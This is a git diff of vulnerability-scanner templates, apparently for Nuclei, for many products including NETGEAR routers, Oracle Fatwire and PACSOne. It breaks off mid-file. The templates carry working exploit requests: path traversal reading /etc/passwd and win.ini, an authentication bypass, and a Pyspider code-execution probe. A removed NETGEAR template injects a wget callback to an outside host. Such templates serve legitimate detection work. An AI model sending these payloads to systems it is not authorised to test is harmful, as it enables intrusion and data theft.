-29,4 +29,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml index 9b0197070e..327a403ef9 100644 --- a/vulnerabilities/other/myucms-lfr.yaml +++ b/vulnerabilities/other/myucms-lfr.yaml @@ -1,10 +1,12 @@ id: myucms-lfr + info: name: MyuCMS Local File Read author: princechaddha severity: high + reference: + - https://blog.csdn.net/yalecaltech/article/details/104908257 tags: myucms,lfi - reference: https://blog.csdn.net/yalecaltech/article/details/104908257 requests: - method: GET diff --git a/vulnerabilities/other/natshell-path-traversal.yaml b/vulnerabilities/other/natshell-path-traversal.yaml index 391bb848a2..629dd6eec9 100644 --- a/vulnerabilities/other/natshell-path-traversal.yaml +++ b/vulnerabilities/other/natshell-path-traversal.yaml @@ -4,7 +4,10 @@ info: name: NatShell Path Traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + metadata: + fofa-query: title="蓝海卓越计费管理系统" tags: natshell,lfi requests: diff --git a/vulnerabilities/other/natshell-rce.yaml b/vulnerabilities/other/natshell-rce.yaml index a9cb6aa19c..389048e371 100644 --- a/vulnerabilities/other/natshell-rce.yaml +++ b/vulnerabilities/other/natshell-rce.yaml @@ -4,7 +4,8 @@ info: name: NatShell Debug File RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + reference: + - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,rce requests: diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 1524463563..2de4ae3d45 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,8 @@ info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including + those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif"). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 @@ -22,7 +23,6 @@ requests: Host: {{Hostname}} Accept: */* - matchers-condition: and matchers: - type: status diff --git a/vulnerabilities/other/netgear-router-exposure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml index 381f0973b1..cafcc346b8 100644 --- a/vulnerabilities/other/netgear-router-exposure.yaml +++ b/vulnerabilities/other/netgear-router-exposure.yaml @@ -2,13 +2,13 @@ id: netgear-router-exposure info: name: NETGEAR Router S/N Disclosure + author: geeknik + severity: critical description: Multiple NETGEAR router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. reference: - https://www.exploit-db.com/exploits/47117 - https://www.exploit-db.com/exploits/45741 - author: geeknik - severity: critical - tags: netgear,exposure,iot + tags: netgear,exposure,iot,router requests: - method: GET diff --git a/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml new file mode 100644 index 0000000000..4c8c191714 --- /dev/null +++ b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml @@ -0,0 +1,27 @@ +id: netgear-wac124-router-auth-bypass + +info: + name: NETGEAR WAC124 Router Authentication Bypass + author: gy741 + severity: high + description: | + This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability. + reference: + - https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc + - https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044 + tags: netgear,auth-bypass,router,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Enable Telnet" \ No newline at end of file diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml deleted file mode 100644 index 3fb5459ca4..0000000000 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: netgear-wnap320-rce - -info: - name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: - - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - tags: netgear,rce,oast,router - -requests: - - raw: - - | - POST /boardDataWW.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - - macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index bb9688eb93..dfe9ded8c3 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -4,8 +4,9 @@ info: name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak author: gy741 severity: medium - reference: https://www.exploit-db.com/exploits/48384 description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. + reference: + - https://www.exploit-db.com/exploits/48384 tags: netis,exposure requests: diff --git a/vulnerabilities/other/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml index 006da625d1..f0ca677575 100644 --- a/vulnerabilities/other/nginx-module-vts-xss.yaml +++ b/vulnerabilities/other/nginx-module-vts-xss.yaml @@ -1,10 +1,10 @@ id: nginx-module-vts-xss info: - name: Nginx virtual host traffic status module XSS + name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting author: madrobot severity: medium - tags: nginx,xss + tags: nginx,xss,status requests: - method: GET @@ -25,4 +25,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 60008dd594..a18b450540 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -2,23 +2,32 @@ id: nsasg-arbitrary-file-read info: name: NS ASG Arbitrary File Read - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://zhuanlan.zhihu.com/p/368054963 + reference: + - https://zhuanlan.zhihu.com/p/368054963 + - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md + metadata: + fofa-query: app="网康科技-NS-ASG安全网关" + shodan-query: http.title:“NS-ASG” tags: nsasg,lfi requests: - method: GET path: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - - type: status - status: - - 200 + - type: word + part: body + words: + - "$certfile" + - "application/pdf" + condition: and diff --git a/vulnerabilities/other/nuuo-file-inclusion.yaml b/vulnerabilities/other/nuuo-file-inclusion.yaml index 0cfcc394fe..f577991d4f 100644 --- a/vulnerabilities/other/nuuo-file-inclusion.yaml +++ b/vulnerabilities/other/nuuo-file-inclusion.yaml @@ -1,10 +1,11 @@ id: nuuo-file-inclusion info: - name: NUUO NVRmini 2 3.0.8 Local File Disclosure + name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/40211 + reference: + - https://www.exploit-db.com/exploits/40211 tags: nuuo,lfi requests: diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index dfad086cc8..8f142eba45 100644 --- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -4,11 +4,11 @@ info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical - tags: rce reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html + tags: rce,nuuo requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/other/oa-tongda-path-traversal.yaml index 56aa950f64..0049e8c3f5 100644 --- a/vulnerabilities/other/oa-tongda-path-traversal.yaml +++ b/vulnerabilities/other/oa-tongda-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: OA TongDa Path Traversal author: pikpikcu severity: critical - reference: https://github.com/jas502n/OA-tongda-RCE + reference: + - https://github.com/jas502n/OA-tongda-RCE tags: tongda,lfi requests: diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index 7f4da77bff..e0224cf506 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software. - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,jsp requests: diff --git a/vulnerabilities/other/odoo-cms-redirect.yaml b/vulnerabilities/other/odoo-cms-redirect.yaml index 9ccd8e1d01..3fecc9364a 100644 --- a/vulnerabilities/other/odoo-cms-redirect.yaml +++ b/vulnerabilities/other/odoo-cms-redirect.yaml @@ -1,11 +1,13 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open redirection all Version + name: Odoo CMS - Open Redirect author: 0x_Akoko - description: Odoo CMS - Open redirection all Version. - reference: https://cxsecurity.com/issue/WLB-2021020143 severity: low + description: Odoo CMS - Open redirection in all versions due to Odoo's policy. + reference: + - https://cxsecurity.com/issue/WLB-2021020143 + - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: diff --git a/vulnerabilities/other/oliver-library-lfi.yaml b/vulnerabilities/other/oliver-library-lfi.yaml new file mode 100644 index 0000000000..4d3eaf3db1 --- /dev/null +++ b/vulnerabilities/other/oliver-library-lfi.yaml @@ -0,0 +1,25 @@ +id: oliver-library-lfi + +info: + name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval + author: gy741 + severity: high + description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input. + reference: + - https://www.exploit-db.com/exploits/50599 + - https://www.softlinkint.com/product/oliver/ + tags: windows,lfi,oliver + +requests: + - method: GET + path: + - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index f2584939c4..8037b9afd6 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,7 +4,8 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high - description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. + description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker + to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 tags: opensis,lfi diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 7bcb4e1a2f..894e0b9a47 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -3,8 +3,8 @@ id: openvpn-hhi info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar - description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field. severity: info + description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field. tags: openvpn,hostheader-injection requests: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 7b87b1527b..a1a850487d 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -1,14 +1,18 @@ id: optilink-ont1gew-gpon-rce info: - name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution + name: OptiLink ONT1GEW GPON Remote Code Execution author: gy741 severity: critical - description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - tags: optiLink,rce,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: optiLink,rce,oast,mirai requests: - raw: @@ -29,3 +33,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/04/01 diff --git a/vulnerabilities/other/oracle-fatwire-lfi.yaml b/vulnerabilities/other/oracle-fatwire-lfi.yaml new file mode 100644 index 0000000000..6858a74129 --- /dev/null +++ b/vulnerabilities/other/oracle-fatwire-lfi.yaml @@ -0,0 +1,26 @@ +id: oracle-fatwire-lfi + +info: + name: Oracle Fatwire 6.3 - Path Traversal + author: Bernardo Rodrigues @bernardofsr + severity: critical + description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint + reference: + - https://www.exploit-db.com/exploits/50167 + tags: lfi,oracle,fatwire + +requests: + - method: GET + path: + - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/otobo-open-redirect.yaml b/vulnerabilities/other/otobo-open-redirect.yaml new file mode 100644 index 0000000000..f18da7474c --- /dev/null +++ b/vulnerabilities/other/otobo-open-redirect.yaml @@ -0,0 +1,22 @@ +id: otobo-open-redirect + +info: + name: Open Redirect in Otobo + author: 0x_Akoko + severity: medium + description: There is a open redirect vulnerability in Otobo + reference: + - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ + - https://github.com/rotheross/otobo + tags: redirect,otobo + +requests: + - method: GET + path: + - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/other/pacsone-server-lfi.yaml b/vulnerabilities/other/pacsone-server-lfi.yaml new file mode 100644 index 0000000000..9ad5ecf688 --- /dev/null +++ b/vulnerabilities/other/pacsone-server-lfi.yaml @@ -0,0 +1,24 @@ +id: pacsone-server-lfi + +info: + name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018010303 + tags: pacsone,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/parentlink-xss.yaml b/vulnerabilities/other/parentlink-xss.yaml index 2f112349cf..9b9766f693 100644 --- a/vulnerabilities/other/parentlink-xss.yaml +++ b/vulnerabilities/other/parentlink-xss.yaml @@ -4,8 +4,9 @@ info: name: Blackboard ParentLink Reflected XSS author: r3naissance severity: medium + reference: + - https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes tags: blackboard,parentlink,xss - reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes requests: - method: GET diff --git a/vulnerabilities/other/pbootcms-database-file-download.yaml b/vulnerabilities/other/pbootcms-database-file-download.yaml new file mode 100644 index 0000000000..9781cd9421 --- /dev/null +++ b/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -0,0 +1,29 @@ +id: pbootcms-database-file-download + +info: + name: PbootCMS v2.0.7 - pbootcms.db File Download + author: ritikchaddha + severity: high + reference: + - https://xz.aliyun.com/t/7628 + - https://www.cnblogs.com/0daybug/p/12786036.html + tags: pbootcms,db,exposure,database,sqlite + +requests: + - method: GET + path: + - "{{BaseURL}}/data/pbootcms.db" + + max-size: 20000 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PbootCMS" + - "SQLite format 3" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index f1d82689fa..83336dff9f 100644 --- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -4,7 +4,7 @@ info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - tags: ssti,rce + tags: ssti,rce,csrf requests: - method: GET diff --git a/vulnerabilities/other/php-timeclock-xss.yaml b/vulnerabilities/other/php-timeclock-xss.yaml index 55686517b4..4da922addd 100644 --- a/vulnerabilities/other/php-timeclock-xss.yaml +++ b/vulnerabilities/other/php-timeclock-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities - reference: https://www.exploit-db.com/exploits/49853 + reference: + - https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock requests: diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index a257806c57..180d517472 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -3,9 +3,10 @@ id: php-zerodium-backdoor-rce info: name: PHP Zerodium Backdoor RCE author: dhiyaneshDk - description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code. - reference: https://news-web.php.net/php.internals/113838 severity: critical + description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code. + reference: + - https://news-web.php.net/php.internals/113838 tags: php,backdoor requests: diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml index 0d0a84e034..dda2c1fdb7 100644 --- a/vulnerabilities/other/phpwiki-lfi.yaml +++ b/vulnerabilities/other/phpwiki-lfi.yaml @@ -5,8 +5,9 @@ info: author: 0x_Akoko severity: high description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. - reference: https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi + reference: + - https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi,xss requests: - method: GET diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 927daf9a9f..69934ef8a1 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -1,14 +1,14 @@ id: pmb-directory-traversal info: - name: PMB 5.6 Directory Traversal + name: PMB 5.6 - Arbitrary File Retrieval author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. - reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. + reference: + - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html tags: lfi - requests: - method: GET path: @@ -20,7 +20,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index a62783f871..b67c0f99da 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -1,10 +1,11 @@ id: pmb-local-file-disclosure info: - name: PMB 5.6 - 'chemin' Local File Disclosure + name: PMB 5.6 - getgif.php Arbitrary File Retrieval author: dhiyaneshDk severity: high - reference: https://www.exploit-db.com/exploits/49054 + reference: + - https://www.exploit-db.com/exploits/49054 tags: lfi,pmb requests: diff --git a/vulnerabilities/other/pollbot-redirect.yaml b/vulnerabilities/other/pollbot-redirect.yaml new file mode 100644 index 0000000000..c11e6df5d3 --- /dev/null +++ b/vulnerabilities/other/pollbot-redirect.yaml @@ -0,0 +1,27 @@ +id: pollbot-redirect + +info: + name: Mozilla Pollbot Services - Unauthenticated Open Redirect + author: Evan Rubinstien + severity: medium + description: Mozilla has a medium severity open redirect vulnerability in pollbot that could be used for social engineering attaks. + reference: + - https://bugzilla.mozilla.org/show_bug.cgi?id=1753838 + - https://github.com/mozilla/PollBot + tags: redirect,mozilla,pollbot + +requests: + - method: GET + path: + - '{{BaseURL}}/%0A/example.com/' + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 301 diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index 629eb80d17..3d96d4b8fe 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -4,7 +4,8 @@ info: name: PowerCreator CMS RCE author: pikpikcu severity: critical - reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/ + reference: + - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/ tags: rce,powercreator requests: diff --git a/vulnerabilities/other/processmaker-lfi.yaml b/vulnerabilities/other/processmaker-lfi.yaml index 2aecb1c745..5645ae5556 100644 --- a/vulnerabilities/other/processmaker-lfi.yaml +++ b/vulnerabilities/other/processmaker-lfi.yaml @@ -21,7 +21,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/pyspider-unauthorized-access.yaml b/vulnerabilities/other/pyspider-unauthorized-access.yaml new file mode 100644 index 0000000000..5a32bf5506 --- /dev/null +++ b/vulnerabilities/other/pyspider-unauthorized-access.yaml @@ -0,0 +1,31 @@ +id: pyspider-unauthorized-access + +info: + name: Pyspider Unauthorized Access + author: ritikchaddha + severity: high + reference: + - https://github.com/ianxtianxt/Pyspider-webui-poc + tags: pyspider,unauth + +requests: + - raw: + - | + POST /debug/pyspidervulntest/run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "1020236437" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index 420879092a..288d0ba81d 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. - reference: https://github.com/qcubed/qcubed/issues/1230 + reference: + - https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed requests: diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index dea9993e30..0dc5ff5f59 100644 --- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -4,7 +4,8 @@ info: name: Qi'anxin Netkang Next Generation Firewall RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce requests: @@ -23,7 +24,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/vulnerabilities/other/qihang-media-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml index 4bc2973454..aef7fffd30 100644 --- a/vulnerabilities/other/qihang-media-disclosure.yaml +++ b/vulnerabilities/other/qihang-media-disclosure.yaml @@ -4,8 +4,10 @@ info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure author: gy741 severity: critical - description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml + and obtain administrative login information that allows for a successful authentication bypass attack. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php tags: qihang,exposure requests: diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml index 42e4aaed79..ea6db6c683 100644 --- a/vulnerabilities/other/qihang-media-lfi.yaml +++ b/vulnerabilities/other/qihang-media-lfi.yaml @@ -1,12 +1,18 @@ id: qihang-media-lfi info: - name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability + name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure author: gy741 severity: high - description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php - tags: qihang,lfi + description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when + using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: qihang,lfi,disclosure requests: - raw: @@ -33,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml new file mode 100644 index 0000000000..a633e9ab50 --- 